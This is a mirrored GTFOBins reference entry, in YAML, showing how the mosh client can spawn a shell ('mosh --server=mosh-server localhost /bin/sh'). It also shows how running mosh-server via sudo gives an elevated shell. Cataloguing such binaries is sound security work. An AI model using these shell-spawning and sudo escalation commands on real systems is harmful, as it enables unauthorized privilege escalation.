mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-08-07 19:54:12 +02:00
13 lines
289 B
Plaintext
13 lines
289 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
mosh --server=mosh-server localhost /bin/sh
|
|
comment: |-
|
|
This requires a valid SSH access.
|
|
contexts:
|
|
sudo:
|
|
comment: |-
|
|
The `mosh-server` has to be executed via `sudo`, e.g., `'--server=sudo mosh-server'`.
|
|
...
|